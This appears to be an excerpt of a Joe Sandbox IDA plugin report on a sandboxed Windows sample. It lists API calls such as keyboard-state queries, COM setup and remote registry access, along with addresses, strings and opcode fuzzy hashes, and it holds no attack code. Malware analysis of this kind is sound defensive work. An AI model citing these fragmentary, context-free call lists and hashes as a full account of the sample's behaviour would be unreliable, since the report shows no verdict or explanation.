                                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                • API String ID: 455036304-4153970271
                                                                                                APIs
                                                                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                                • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                                • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                                • _memmove.LIBCMT ref: 00467EB8
                                                                                                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                                • _memmove.LIBCMT ref: 00467F6C
                                                                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                                • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                                Similarity
                                                                                                • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                                                • String ID:
                                                                                                • API String ID: 2170234536-0
                                                                                                APIs
                                                                                                • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                                • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                                • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                                • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                                • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                                • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                                • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                                Similarity
                                                                                                • API ID: State$Async$Keyboard
                                                                                                • String ID:
                                                                                                • API String ID: 541375521-0
                                                                                                • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                                • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                                • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                                • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                                • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                                • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                                • String ID:
                                                                                                • API String ID: 3096461208-0
                                                                                                • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                                • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                                                • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                                                • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                                                • DeleteObject.GDI32(?), ref: 0047151E
                                                                                                • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                                                • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                                                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                                                • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                                                • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                                                • DeleteObject.GDI32(?), ref: 004715EA
                                                                                                • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3218148540-0
                                                                                                • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                                • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                • String ID:
                                                                                                • API String ID: 136442275-0
                                                                                                • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                                                • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                                                APIs
                                                                                                • _wcsncpy.LIBCMT ref: 00467490
                                                                                                • _wcsncpy.LIBCMT ref: 004674BC
                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                • _wcstok.LIBCMT ref: 004674FF
                                                                                                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                • _wcstok.LIBCMT ref: 004675B2
                                                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                • _wcslen.LIBCMT ref: 00467793
                                                                                                • _wcscpy.LIBCMT ref: 00467641
                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                • _wcslen.LIBCMT ref: 004677BD
                                                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                • String ID: X
                                                                                                • API String ID: 3104067586-3081909835
                                                                                                • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                                • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                                                • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                                • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                                APIs
                                                                                                • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                                • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                                                • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                                • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                                • _wcslen.LIBCMT ref: 0046CDB0
                                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                                • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                                • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                                  • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                                  • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                                  • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                                Strings
                                                                                                • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                                                • String ID: NULL Pointer assignment
                                                                                                • API String ID: 440038798-2785691316
                                                                                                • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                                • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                                                APIs
                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                                • _wcslen.LIBCMT ref: 004610A3
                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                                • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                                  • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                                                • String ID: ThumbnailClass
                                                                                                • API String ID: 4136854206-1241985126
                                                                                                • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                                • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                                APIs
                                                                                                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                                                • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                                • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                                • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                                                • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                • String ID: 2
                                                                                                • API String ID: 1331449709-450215437
                                                                                                • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                                • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                • __swprintf.LIBCMT ref: 00460915
                                                                                                • __swprintf.LIBCMT ref: 0046092D
                                                                                                • _wprintf.LIBCMT ref: 004609E1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                                                • API String ID: 3054410614-2561132961
                                                                                                • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                                                • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                                                APIs
                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                                • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                                • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                • API String ID: 600699880-22481851
                                                                                                • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                                • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: DestroyWindow
                                                                                                • String ID: static
                                                                                                • API String ID: 3375834691-2160076837
                                                                                                • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                                • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                                • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$DriveType
                                                                                                • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                                • API String ID: 2907320926-3566645568
                                                                                                • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                                • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                                                APIs
